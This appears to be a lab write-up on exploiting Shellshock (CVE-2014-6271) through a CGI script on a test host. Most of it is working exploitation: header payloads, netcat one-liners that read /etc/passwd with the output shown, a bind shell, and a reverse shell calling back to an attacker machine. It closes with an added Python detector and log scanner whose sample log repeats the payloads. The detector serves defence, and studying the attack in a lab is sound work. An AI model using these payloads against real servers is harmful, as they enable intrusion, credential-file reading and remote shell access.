CVE-2014-6271_Shellshock
Fingerprinting
- Find a CGI script:
http://10.0.2.129/cgi-bin/status
Exploitation
- Insert the following into a request header (for example User-Agent):
() { :;}; echo; echo 'Shellshock: Vulnerable'
GET /cgi-bin/status HTTP/1.1
Host: 10.0.2.129
User-Agent: () { :;}; echo; echo 'Shellshock: Vulnerable'
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://10.0.2.129/
DNT: 1
Connection: close
- The response will contain the string:
Shellshock: Vulnerable
- Or send the request with echo:
root@kali:~# echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: 10.0.2.129\r\nConnection: close\r\n\r\n" | nc 10.0.2.129 80
HTTP/1.1 200 OK
Date: Wed, 23 Nov 2016 22:19:58 GMT
Server: Apache/2.2.21 (Unix) DAV/2
root: x:0:0:root:/root:/bin/sh lp: x:7:7:lp:/var/spool/lpd:/bin/sh nobody: x:65534:65534:nobody:/nonexistent:/bin/false tc: x:1001:50:Linux User,,,:/home/tc:/bin/sh pentesterlab: x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
Content-Length: 175
Connection: close
Content-Type: application/json
Bind shell
Make the target listen on port 9999:
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: 10.0.2.129\r\nConnection: close\r\n\r\n" | nc 10.0.2.129 80
Then we connect to it:
root@kali:~# nc -v 10.0.2.129 9999
10.0.2.129: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.2.129] 9999 (?) open
id
uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab)
uname -a
Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux
Reverse Shell
First we start a listener:
root@kali:~# nc -lnvp 443
listening on [any] 443 ...
connect to [10.0.2.133] from (UNKNOWN) [10.0.2.129] 49030
id
uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab)
uname -a
Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux
Then, as before, insert into User-Agent:
() { :;}; echo; /usr/bin/nc 10.0.2.133 443 -e /bin/bash;
After sending it, the reverse shell is established:
GET /cgi-bin/status HTTP/1.1
Host: 10.0.2.129
User-Agent: () { :;}; echo; /usr/bin/nc 10.0.2.133 443 -e /bin/bash;
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://10.0.2.129/
DNT: 1
Connection: close
Or send it directly with echo:
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.2.133 443 -e /bin/sh\r\nHost: 10.0.2.129\r\nConnection: close\r\n\r\n" | nc 10.0.2.129 80
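Every payload in this write-up (the fingerprint, the bind shell and the reverse shell) shares the same prefix: a bash function definition `() { ... };` followed by commands, delivered in a header that the CGI handler exports as an environment variable. That prefix is what a detection rule should key on. The Python below is an added, defender-side example and not part of the original write-up: it checks a parsed header set for the signature and scans Apache combined-format access log lines for it. The log lines are constructed for this example (they reuse the hosts and paths above); the regex covers the original CVE-2014-6271 form shown on this page, not the later follow-on bash parser variants.

```python
import re
from typing import Dict, Iterable, List, NamedTuple
from urllib.parse import unquote

# A Shellshock payload opens with an empty bash function definition "() {",
# closes the body with "}" and then appends commands after ";".  Whitespace
# inside the definition varies between tools, so it is matched loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")

# Apache "combined" log format:
#   ip - user [time] "request-line" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Only these request fields are recorded in a combined log.
LOGGED_FIELDS = {"request": "Request-Line", "referer": "Referer", "ua": "User-Agent"}


class Finding(NamedTuple):
    line_no: int
    source_ip: str
    header: str    # where the payload was carried
    payload: str


def is_shellshock_payload(value: str) -> bool:
    """True if a header value carries a bash function-definition payload.

    The value is URL-decoded first so an encoded "%28%29%20%7B" does not
    slip past the check.
    """
    return SHELLSHOCK_RE.search(unquote(value)) is not None


def scan_headers(headers: Dict[str, str]) -> List[str]:
    """Return the names of the request headers that carry a payload.

    Use this in front of a CGI handler or in a WAF hook: every header is
    exported into the environment, so every header must be checked, not
    just User-Agent.
    """
    return [name for name, value in headers.items() if is_shellshock_payload(value)]


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    """Scan Apache combined-format lines and report payload hits."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line.rstrip("\n"))
        if m is None:
            continue  # not a combined-format line; skip it
        for field, header_name in LOGGED_FIELDS.items():
            value = m.group(field)
            if is_shellshock_payload(value):
                findings.append(Finding(line_no, m.group("ip"), header_name, value))
                break  # one finding per line is enough for triage
    return findings


# Constructed sample log (not real captured traffic): a probe, a benign
# browser request, a bind-shell attempt and a reverse-shell attempt.
SAMPLE_LOG = [
    '10.0.2.133 - - [23/Nov/2016:22:19:58 +0000] "GET /cgi-bin/status HTTP/1.1" 200 175 '
    '"http://10.0.2.129/" "() { :;}; echo; echo \'Shellshock: Vulnerable\'"',
    '10.0.2.133 - - [23/Nov/2016:22:20:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 175 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/49.0"',
    '10.0.2.133 - - [23/Nov/2016:22:21:03 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - '
    '"-" "() { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh"',
    '10.0.2.133 - - [23/Nov/2016:22:22:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 175 '
    '"-" "() { :; }; echo; /usr/bin/nc 10.0.2.133 443 -e /bin/bash;"',
]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.source_ip} via {f.header}: {f.payload}")
```

A combined log only records the request line, Referer and User-Agent, so a payload placed in any other header (Cookie, Accept, a custom header) is invisible to `scan_access_log`; `scan_headers` is the check to run on the live request where all headers are available. Either way the finding is an indicator, not proof of success: the actual fix is a patched bash on the web server, and the echo probe from the Fingerprinting section above is the quickest way to confirm the patch took effect.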